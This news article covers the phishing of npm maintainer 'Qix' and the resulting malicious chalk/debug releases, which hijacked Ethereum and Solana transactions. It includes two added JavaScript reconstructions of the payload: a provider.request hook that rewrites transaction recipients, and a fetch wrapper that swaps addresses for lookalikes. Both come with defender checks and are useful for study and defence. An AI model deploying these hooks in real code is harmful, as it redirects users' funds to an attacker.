Ethereum, Solana wallets targeted in npm attack on packages with billions of downloads, only 5 cents taken

A phishing email on Monday took down one of Node.js’s most prolific developers, pushing malicious code into packages that are downloaded billions of times a week in what researchers are calling the largest software supply chain attack in recent memory.

While the reach of the attack was massive, the Security Alliance said in a Tuesday report that the attacker walked away with only a few cents. Security teams, however, now face the significant cost of auditing and updating affected systems to guard against further attacks.

A highly prolific maintainer known as “Qix”, responsible for libraries such as chalk and debug-js that see billions of downloads every week, was compromised on Monday after receiving an email from support@npmjs[.]help. The domain at one point resolved to a Russian server and redirected to a counterfeit two-factor approval page hosted on the content delivery network BunnyCDN.

The credential stealer harvested the username, password and 2FA code and sent them to an external host. A time-based one-time code offers little protection against this kind of page: it is valid for a short window, and a phishing site that relays it immediately can log in before it expires, which is why phishing-resistant factors such as hardware security keys are the recommended protection for publish access. With full access to the account, the attacker published a new version of every Qix package carrying a crypto-focused payload.

Node Package Manager (abbreviated npm, written in lowercase) is like an app store for developers: it is where coders download small building blocks of code, called packages, instead of writing everything from scratch. A maintainer is the person or team that creates and updates these packages.

How the attack happened

The injected code was simple. It checked whether window.ethereum was present and, if so, hooked Ethereum’s core transaction functions. Calls to approve, permit, transfer or transferFrom were silently redirected to a single wallet, 0xFC4A4858BAFEF54D1B1D7697BFB5C52F4C166976.

Any Ethereum transaction carrying value but no calldata was also redirected. For Solana, the malware overwrote the recipient with an invalid string beginning “1911…”, which simply broke transfers outright.
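To make the transaction-side hooking concrete, the following is a simplified reconstruction written for this page; it is not code from the compromised packages or from any wallet. It stands in an EIP-1193 style provider with a synchronous stub (real providers return promises), uses the standard ERC-20 and EIP-2612 function selectors, and uses made-up addresses everywhere except the attacker wallet named above. It also shows the check a wallet needs to make: decode the recipient that actually reaches the provider and compare it with what the user intended, rather than trusting what the dApp’s page displays.

```javascript
// Added example (not code from the compromised packages or any wallet):
// a simplified reconstruction of the transaction-rewriting hook and the
// recipient check that defeats it. The provider is a synchronous stub;
// real EIP-1193 providers return promises.
const ATTACKER_WALLET = "0xFC4A4858BAFEF54D1B1D7697BFB5C52F4C166976"; // named in the article

// ERC-20 / EIP-2612 selectors the article names, mapped to the index of the
// 32-byte argument word that holds the recipient or spender address.
const TARGET_SELECTORS = {
  "0x095ea7b3": 0, // approve(address spender, uint256 amount)
  "0xa9059cbb": 0, // transfer(address to, uint256 amount)
  "0x23b872dd": 1, // transferFrom(address from, address to, uint256 amount)
  "0xd505accf": 1, // permit(address owner, address spender, uint256, uint256, uint8, bytes32, bytes32)
};

// Left-pad a hex quantity or address to one 32-byte ABI word.
const padWord = (hex) => hex.replace(/^0x/i, "").toLowerCase().padStart(64, "0");

// Find where the recipient lives in a transaction: the `to` field of a plain
// value transfer, or an address argument of one of the hooked token calls.
function locateRecipient(tx) {
  const data = (tx.data || "0x").toLowerCase();
  const value = BigInt(tx.value || "0x0");
  if (data === "0x" && value > 0n) return { kind: "value", recipient: tx.to, wordIndex: -1 };
  const selector = data.slice(0, 10);
  const idx = TARGET_SELECTORS[selector];
  if (idx === undefined || data.length < 10 + (idx + 1) * 64) return null;
  const word = data.slice(10 + idx * 64, 10 + (idx + 1) * 64);
  return { kind: selector, recipient: "0x" + word.slice(24), wordIndex: idx };
}

// Attacker side: swap the recipient in place, leaving everything else intact.
function rewriteRecipient(tx, newAddr) {
  const loc = locateRecipient(tx);
  if (!loc) return tx;
  if (loc.kind === "value") return { ...tx, to: newAddr };
  const data = tx.data.toLowerCase();
  const start = 10 + loc.wordIndex * 64;
  return { ...tx, data: data.slice(0, start) + padWord(newAddr) + data.slice(start + 64) };
}

// Attacker side: monkey-patch provider.request so eth_sendTransaction is altered
// after the dApp built the transaction but before the wallet sees it.
function installMaliciousHook(provider) {
  const original = provider.request.bind(provider);
  provider.request = (args) => {
    if (args.method !== "eth_sendTransaction") return original(args);
    const [tx, ...rest] = args.params;
    return original({ ...args, params: [rewriteRecipient(tx, ATTACKER_WALLET), ...rest] });
  };
}

// Defender side: decode the recipient that actually reached the provider and
// compare it with what the user meant to send to. A wallet that displays this
// decoded address, rather than trusting the dApp's UI, exposes the swap.
function recipientMatches(tx, intended) {
  const loc = locateRecipient(tx);
  return loc !== null && loc.recipient.toLowerCase() === intended.toLowerCase();
}

// Constructed provider stub that records what it receives.
function makeStubProvider() {
  const provider = { sent: [] };
  provider.request = (args) => { provider.sent.push(args); return "0x" + "ab".repeat(32); };
  return provider;
}

const INTENDED = "0x1111111111111111111111111111111111111111"; // constructed
const TOKEN = "0x2222222222222222222222222222222222222222";    // constructed

// ERC-20 transfer(INTENDED, 100) sent through a hooked provider.
function demoTokenTransfer() {
  const provider = makeStubProvider();
  installMaliciousHook(provider);
  const tx = { to: TOKEN, value: "0x0", data: "0xa9059cbb" + padWord(INTENDED) + padWord("0x64") };
  provider.request({ method: "eth_sendTransaction", params: [tx] });
  const delivered = provider.sent[0].params[0];
  return { delivered: locateRecipient(delivered).recipient, tampered: !recipientMatches(delivered, INTENDED) };
}

// Plain 1 ETH value transfer: the `to` field itself is replaced.
function demoValueTransfer() {
  const provider = makeStubProvider();
  installMaliciousHook(provider);
  provider.request({ method: "eth_sendTransaction", params: [{ to: INTENDED, value: "0xde0b6b3a7640000", data: "0x" }] });
  return provider.sent[0].params[0].to;
}

// A call the hook does not recognise (balanceOf) passes through unchanged.
function demoUntouchedCall() {
  const provider = makeStubProvider();
  installMaliciousHook(provider);
  const tx = { to: TOKEN, value: "0x0", data: "0x70a08231" + padWord(INTENDED) };
  provider.request({ method: "eth_sendTransaction", params: [tx] });
  return provider.sent[0].params[0].data === tx.data;
}
```

The point of `recipientMatches` is that the swap happens between the dApp and the wallet, so any check that reads the dApp’s own variables is too early; only what the wallet finally receives, decoded from calldata, is authoritative. This is the same reason the staged, code-pinned release process and address screening MetaMask describes below matter more than anything in the page’s JavaScript.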

Network requests were intercepted as well.

By hooking fetch and XMLHttpRequest, the malware scanned JSON responses for substrings that looked like wallet addresses and replaced them with one of 280 hard-coded alternatives chosen to look deceptively similar.
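The response-rewriting side is reconstructed below as an added example, again not code from the compromised packages. It uses a constructed three-entry lookalike pool instead of the attacker’s 280, scores similarity with plain edit distance (the article only says the substitutes were chosen to look similar; the scoring function is an assumption), and stands in for fetch and XMLHttpRequest with a synchronous JSON-returning stub so it runs offline. Alongside the hook are two checks a page or wallet can run: whether the global fetch still looks like native code, and whether an address about to be shown or used is a near miss of a trusted copy.

```javascript
// Added example (not code from the compromised packages): a reconstruction of
// the response-rewriting hook with a three-entry constructed lookalike pool in
// place of the attacker's 280, plus two defender checks. fetch/XMLHttpRequest
// are stood in for by a synchronous JSON-returning stub so this runs offline.

const ETH_ADDRESS_RE = /\b0x[0-9a-fA-F]{40}\b/g;

// Constructed pool. Only the first entry is the wallet named in the article.
const LOOKALIKE_POOL = [
  "0xFC4A4858BAFEF54D1B1D7697BFB5C52F4C166976",
  "0x1111111111111111111111111111111111111122",
  "0xAbCd0000000000000000000000000000000000Ef",
];

// Classic edit distance. The article says substitutes were picked to look
// similar; edit distance is an assumed, common way to score that.
function levenshtein(a, b) {
  let prev = Array.from({ length: b.length + 1 }, (_, i) => i);
  for (let i = 1; i <= a.length; i++) {
    const cur = [i];
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      cur[j] = Math.min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + cost);
    }
    prev = cur;
  }
  return prev[b.length];
}

function closestLookalike(addr, pool) {
  let best = pool[0], bestDist = Infinity;
  for (const cand of pool) {
    const d = levenshtein(addr.toLowerCase(), cand.toLowerCase());
    if (d < bestDist) { bestDist = d; best = cand; }
  }
  return best;
}

// Attacker side: rewrite every address-shaped substring in a response body.
function rewriteAddresses(text, pool) {
  return text.replace(ETH_ADDRESS_RE, (m) => closestLookalike(m, pool));
}

// Attacker side: wrap a fetch-like function so callers get the altered body.
// In a browser this would wrap window.fetch and XMLHttpRequest's response
// getters; here realFetchJson is any function returning parsed JSON synchronously.
function hookFetchJson(realFetchJson, pool) {
  return (url) => JSON.parse(rewriteAddresses(JSON.stringify(realFetchJson(url)), pool));
}

// Defender check 1: a wrapped function no longer prints as native code.
// Caveat: a hook can patch Function.prototype.toString too, so this is a
// tripwire, not proof of integrity.
function isNativeFunction(fn) {
  return /\{\s*\[native code\]\s*\}\s*$/.test(Function.prototype.toString.call(fn));
}

// Defender check 2: compare an address about to be shown or used with a trusted
// copy held elsewhere and flag near misses. The 4-edit threshold is a constructed choice.
function flagLookalike(shown, trusted) {
  if (shown.toLowerCase() === trusted.toLowerCase()) return "match";
  return levenshtein(shown.toLowerCase(), trusted.toLowerCase()) <= 4 ? "lookalike" : "unrelated";
}

// Constructed stand-in for an API that hands the page a deposit address.
const SAMPLE_API_RESPONSE = {
  deposit_address: "0x1111111111111111111111111111111111111111",
  memo: "send ETH here",
};
const fakeFetchJson = () => SAMPLE_API_RESPONSE;

function demoResponseSwap() {
  const hooked = hookFetchJson(fakeFetchJson, LOOKALIKE_POOL);
  const clean = fakeFetchJson().deposit_address;
  const tampered = hooked("https://api.example.invalid/deposit").deposit_address;
  return {
    clean,
    tampered,
    verdict: flagLookalike(tampered, clean),
    hookLooksNative: isNativeFunction(hooked),
    realNativeLooksNative: isNativeFunction(Math.max),
  };
}
```

Because the swap happens inside the page’s own JavaScript, `flagLookalike` only helps if the trusted copy comes from somewhere the hook cannot reach, such as a wallet’s address book or a hardware device’s screen; that is the property the page attributes to Blockaid-style address screening and to hardware wallets.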

The effect of the attack

For all that reach, the impact was negligible.

On-chain data shows the attacker received only about five cents and roughly $20 worth of an illiquid memecoin that had traded less than $600 in volume, the Security Alliance report said.

The popular browser wallet MetaMask said on X that it was not affected by the npm supply chain attack, as it pins the versions of the code it ships, uses both manual and automated controls, and rolls out updates in stages. It also uses LavaMoat, which contains malicious code even if it is inserted, and Blockaid, which quickly flags compromised destination addresses, to keep such attacks in check.

Meanwhile, Ledger CTO Charles Guillemet warned that the malicious code had been pushed into packages with over a billion downloads and was designed to silently swap destination addresses in transactions.

The attack follows another case flagged last week by ReversingLabs, in which npm packages used Ethereum smart contracts to hide malware links, a technique that disguised command-and-control traffic as ordinary blockchain calls.
